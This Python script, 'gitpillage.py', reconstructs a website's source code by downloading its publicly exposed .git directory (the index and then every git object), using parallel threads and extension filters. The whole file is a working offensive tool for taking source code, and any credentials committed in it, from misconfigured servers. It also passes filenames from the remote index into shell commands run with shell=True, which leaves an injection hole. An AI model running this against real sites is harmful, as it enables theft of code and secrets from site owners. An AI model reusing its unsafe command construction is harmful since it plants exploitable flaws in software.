#!/usr/bin/python3


# inspired by https://github.com/koto/gitpillage/blob/master/gitpillage.sh
# example: python3 gitpillage.py -u https://www.example.com -t 10

#
### functions
#
def downloadFile( url ):
    try:
        r = requests.get( url, timeout=3 )
        return r
    except Exception as e:
        sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
        return False


def downloadOject( t_extension, t_exclude, file ):
    sys.stdout.write( 'progress: %d/%d\r' %  (t_multiproc['n_current'],t_multiproc['n_total']) )
    t_multiproc['n_current'] = t_multiproc['n_current'] + 1

    file = file.strip()
    if not len(file):
        return False

    # 0: object_id , 1: real filename
    tmp = file.split(':')
    object_id = tmp[0]
    real_filename = tmp[1]
    ext = real_filename.split('.')[-1]
    # print(ext)

    # make the test easier to read/understand
    if len(t_extension):
        if ext in t_extension:
            go = True
        else:
            go = False

    if len(t_exclude):
        if ext in t_exclude:
            go = False
        else:
            go = True

    if not go:
        if t_multiproc['verbose']:
            sys.stdout.write( "%s[*] skip extension: %s%s\n" % (fg('dark_gray'),real_filename,attr(0)) )
        return False

    u = git_url + '/objects/' + object_id[0:2] + '/' + object_id[2:]
    # print(u)
    r = downloadFile( u )

    if type(r) is bool:
        if t_multiproc['verbose']:
            sys.stdout.write( "%s[-] %s%s\n" % (fg('dark_gray'),u,attr(0)) )
        return False

    if not r.status_code == 200:
        if t_multiproc['verbose']:
            sys.stdout.write( "%s[-] %s (%d)%s\n" % (fg('dark_gray'),u,r.status_code,attr(0)) )
        return False

    filename = saveObject( output_dir, object_id, r.content )
    real_filename = output_dir + '/' + real_filename

    try:
        cmd = 'cd ' + output_dir + '; git checkout ' + tmp[1]
        output = subprocess.check_output( cmd, stderr=subprocess.STDOUT, shell=True ).decode('utf-8')
        t_multiproc['n_success'] = t_multiproc['n_success'] + 1
        display = "[+] %s (%d) %s-> %s (%d)%s\n" % (u,r.status_code,fg('cyan'),real_filename,len(r.content),attr(0))
    except Exception as e:
        if t_multiproc['verbose']:
            display = "[-] %s (%d) %s-> %s%s\n" % (u,r.status_code,fg('yellow'),e,attr(0))
        return False

    sys.stdout.write( display )


def saveObject( output_dir, object_id, content ):
    dirname = output_dir + '/.git/objects/'+ object_id[0:2]
    filename = dirname + '/' + object_id[2:]
    # print(filename)

    if not os.path.isdir(dirname):
        try:
            os.makedirs( dirname )
        except Exception as e:
            sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
            return False

    fp = open( filename, 'wb')
    fp.write( content )
    fp.close()

    return filename
#
###
#


import os
import sys
import argparse
import requests
import subprocess
from functools import partial
from urllib.parse import urlparse
from colored import fg, bg, attr
from multiprocessing.dummy import Pool


#
### variables
#
max_threads = 5
t_extension = []
t_exclude = ['png','gif','jpg','jpeg','ico','svg','eot','otf','ttf','woff','woff2','css','less','po','mo','mp3','mp4','mpeg','avi']

parser = argparse.ArgumentParser()
parser.add_argument( "-u","--url",help="url of the .git, but without the .git directory" )
parser.add_argument( "-t","--threads",help="threads, default: 5" )
parser.add_argument( "-e","--extension",help="extensions to download separated by comma, overwrite --exclude, default: all but default exclude" )
parser.add_argument( "-x","--exclude",help="extensions to exclude separated by comma, default: "+','.join(t_exclude) )
parser.add_argument( "-v","--verbose",help="verbose mode, default: off", action="store_true" )
parser.parse_args()
args = parser.parse_args()

if args.url:
    url = args.url.strip('/')
else:
    parser.error( 'url list missing' )

if args.threads:
    max_threads = int(args.threads)

if args.exclude:
    t_extension = []
    t_exclude = args.exclude.split(',')

if args.extension:
    t_extension = args.extension.split(',')
    t_exclude = []

if not url.startswith( 'http' ):
    url = 'https://'+url

if args.verbose:
    verbose = True
else:
    verbose = False

git_url = url + '/.git'
t_url_parse = urlparse( url )
output_dir = os.getcwd() + '/' + t_url_parse.netloc
#
###
#


#
### init
#
if not os.path.isdir(output_dir):
    try:
        os.makedirs( output_dir )
    except Exception as e:
        sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
        exit()

sys.stdout.write( "%s[+] output directory: %s%s\n" % (fg('green'),output_dir,attr(0)) )


try:
    cmd = 'cd ' + output_dir + '; git init'
    output = subprocess.check_output( cmd, stderr=subprocess.STDOUT, shell=True ).decode('utf-8')
    sys.stdout.write( "[+] %s\n" % output.strip() )
except Exception as e:
    sys.stdout.write( "%s[-] error occurred, cannot initialize repository%s\n" % (fg('red'),attr(0)) )
    sys.stdout.write( "%s[-] %s%s\n" % (fg('red'),e,attr(0)) )
    exit()
#
###
#


#
### create local repository
#
u = git_url + '/index'
r = downloadFile( u )
if not r:
    sys.stdout.write( "%s[-] cannot find index file: %s%s\n" % (fg('red'),u,attr(0)) )
    exit()
sys.stdout.write( "%s[+] index file found: %s%s\n" % (fg('green'),u,attr(0)) )

fp = open( output_dir+'/.git/index', 'wb' )
fp.write( r.content )
fp.close()

try:
    cmd = 'cd ' + output_dir + '; git ls-files --stage | awk \'{print $2":"$4}\''
    output = subprocess.check_output( cmd, stderr=subprocess.STDOUT, shell=True ).decode('utf-8')
    t_ls_files = output.split("\n")
except Exception as e:
    sys.stdout.write( "%s[-] error occurred, cannot initialize repository%s\n" % (fg('red'),attr(0)) )
    sys.stdout.write( "%s[-] %s%s\n" % (fg('red'),e,attr(0)) )
    exit()
#
###
#


#
### main loop
#
t_multiproc = {
    'n_current': 0,
    'n_total': len(t_ls_files),
    'n_success': 0,
    'verbose': verbose,
}

pool = Pool( max_threads )
pool.map( partial(downloadOject,t_extension,t_exclude), t_ls_files )
pool.close()
pool.join()
#
###
#


sys.stdout.write( "%s[+] %d files successfully downloaded%s\n" % (fg('green'),t_multiproc['n_success'],attr(0)) )
